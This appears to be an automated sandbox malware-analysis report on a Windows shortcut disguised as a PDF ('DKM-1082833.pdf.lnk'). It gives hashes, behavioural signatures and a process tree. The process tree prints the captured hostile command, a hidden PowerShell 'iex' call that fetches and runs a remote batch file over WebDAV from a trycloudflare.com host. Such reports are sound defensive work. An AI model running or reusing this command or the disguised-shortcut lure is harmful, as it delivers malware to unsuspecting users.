Analysis

  • max time kernel
    95s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2024 13:51

General

  • Target

    DKM-1082833.pdf.lnk

  • Size

    2KB

  • MD5

    1369ab003d0c183c021ebd888a7a9fef

  • SHA1

    7aaeb01906a77d9a97a0285919a062703331a79e

  • SHA256

    3f64fc7def34bfe9b96fdbb1a9aaaa3cba6955bf96c361c884c69be7c7c2cd4e

  • SHA512

    ab1b3384885c7f0230d8f01dcc16ae25725d69743b44eb6d1c3a23a3d69cca9579e75529283669d4a29caf1ae577047c71e3e1ca527eb64c3a5dfe560ad67f60

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\DKM-1082833.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iex '& \\llp-cleaners-brands-hl.trycloudflare.com@SSL\DavWWWRoot\tut.bat'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuml0aip.0jm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2572-2-0x00007FFEA9B63000-0x00007FFEA9B65000-memory.dmp

    Filesize

    8KB

  • memory/2572-3-0x0000020FF0360000-0x0000020FF0382000-memory.dmp

    Filesize

    136KB

  • memory/2572-13-0x00007FFEA9B60000-0x00007FFEAA621000-memory.dmp

    Filesize

    10.8MB

  • memory/2572-14-0x00007FFEA9B60000-0x00007FFEAA621000-memory.dmp

    Filesize

    10.8MB

  • memory/2572-17-0x00007FFEA9B60000-0x00007FFEAA621000-memory.dmp

    Filesize

    10.8MB

  • memory/2572-18-0x0000020FF04E0000-0x0000020FF06FC000-memory.dmp

    Filesize

    2.1MB

  • memory/2572-19-0x00007FFEA9B60000-0x00007FFEAA621000-memory.dmp

    Filesize

    10.8MB